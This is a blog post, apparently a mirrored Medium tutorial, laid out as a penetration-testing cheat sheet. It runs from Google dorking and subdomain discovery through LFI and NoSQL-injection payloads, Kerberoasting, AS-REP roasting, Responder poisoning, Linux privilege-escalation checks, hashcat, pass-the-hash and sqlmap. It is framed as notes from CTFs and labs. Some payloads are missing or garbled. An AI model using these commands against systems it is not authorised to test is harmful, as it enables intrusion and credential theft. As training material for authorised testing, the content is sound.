The Ultimate Pentester’s Cheat Sheet: From Recon to Active Directory

medium.com · Eugene Softley (softsec) · 12 days ago · tutorial
quality 9/10 · excellent
0 net
Tags
bug-bounty
The Ultimate Pentester's Cheat Sheet: From Recon to Active Directory | by Eugene Softley (softsec) - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original The Ultimate Pentester's Cheat Sheet: From Recon to Active Directory In the fast-paced world of cybersecurity, having a reliable "brain dump" is the difference between a successful engagement and a dead end… Eugene Softley (softsec) Follow ~3 min read · March 30, 2026 (Updated: March 30, 2026) · Free: Yes In the fast-paced world of cybersecurity, having a reliable "brain dump" is the difference between a successful engagement and a dead end. These are my personal notes, curated from countless hours of CTFs and labs, structured into a logical workflow. 1. External Recon & Information Gathering Before touching the target, you need to know what exists. Google & GitHub Dorking Search engines are the most underrated hacking tools. Find Exposed API Keys: intitle:"index of" api_key OR "api key" OR apiKey -pool Exposed WordPress Users: inurl:"/wp-json/wp/v2/users" GitHub Sensitive Data: "nasa.gov" passwd (Replace with your target domain). Subdomain & Asset Discovery Don't just scan a single IP; find the whole ecosystem. Passive Discovery ( amass ): amass enum -passive -d target.com HTTP Probing: Identify which subdomains are actually alive. cat subs.txt | sort -u | httprobe --prefer-https > live_assets.txt Technology Identification: whatweb -a 1 $IP (Stealthy) or whatweb -a 3 $IP (Aggressive). 2. Web Vulnerability Research Once you have a web target, the goal is to find entry points through fuzzing and parameter analysis. Directory & Parameter Fuzzing Directory Brute Force ( FFUF ): ffuf -w /path/to/wordlist -u https://target/FUZZ Virtual Host Discovery: ffuf -w subdomains.txt -u http://target.htb/ -H "Host: FUZZ.target.htb" -fc 302 Hidden Parameter Mining: Use arjun to find parameters the developers forgot to hide. arjun -u https://api.target.com/endpoint -m POST Common Web Attack Payloads XSS (Reflected): LFI / Path Traversal: Linux: ../../../../etc/passwd Windows: ..\..\..\windows\win.ini NoSQL Injection (Bypass Login): {"username": {"$gt": ""}, "password": {"$gt": ""}} 3. Active Directory (AD) Domination In a Windows environment, AD is the "Holy Grail." Here is the path from zero to Domain Admin. Initial Enumeration (Port 135, 445, 88) Check for Null Sessions: rpcclient $IP -U '' (Then use enumdomusers ). SMB Share Enumeration: cme smb $IP --shares -u 'guest' -p '' RID Cycling: If you have one set of valid creds, find all other users. lookupsid.py domain/user:pass@$IP Advanced AD Attacks Kerberoasting: Requesting service tickets to crack offline. GetUserSPNs.py -dc-ip $IP domain/user:pass -request AS-REP Roasting: Targeting users who don't require pre-authentication. GetNPUsers.py -dc-ip $IP -no-pass -usersfile users.txt domain/м LLMNR/NBT-NS Poisoning: Use Responder to intercept hashes on the wire. responder -I eth0 -dwP 4. Linux Post-Exploitation & PrivEsc Once you have a shell, the real work begins. Stabilization Never work in a "dumb" shell. Stabilize it immediately: python3 -c "import pty; pty.spawn('/bin/bash')" # Then background with Ctrl+Z and run: stty raw -echo; fg Finding the Path to Root Check SUID Binaries: Files that run as root. find / -perm -u=s -type f 2>/dev/null Capabilities: getcap -r / 2>/dev/null Sudo Rights: sudo -l Pro Tip: Always cross-reference SUID/Sudo findings with GTFOBins . If cat or perl has special permissions, it's a direct path to root. 5. Quick Reference Tables Cracking — Hashcat hashcat -m 1800 hash.txt rockyou.txt Pass-the-Hash — Psexec psexec.py user@$IP -hashes : API Scanning — KiteRunner kr scan http://api.target -w routes.kite SQL Injection — SQLMap sqlmap -r request.req --batch --dbs Final Thoughts Pentesting is as much about the quality of your notes as it is about the speed of your typing. This cheat sheet is a living document — keep it updated, keep it organized, and always stay curious. #pentesting #bug-bounty #cheatsheet #active-directory-security #web-security Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories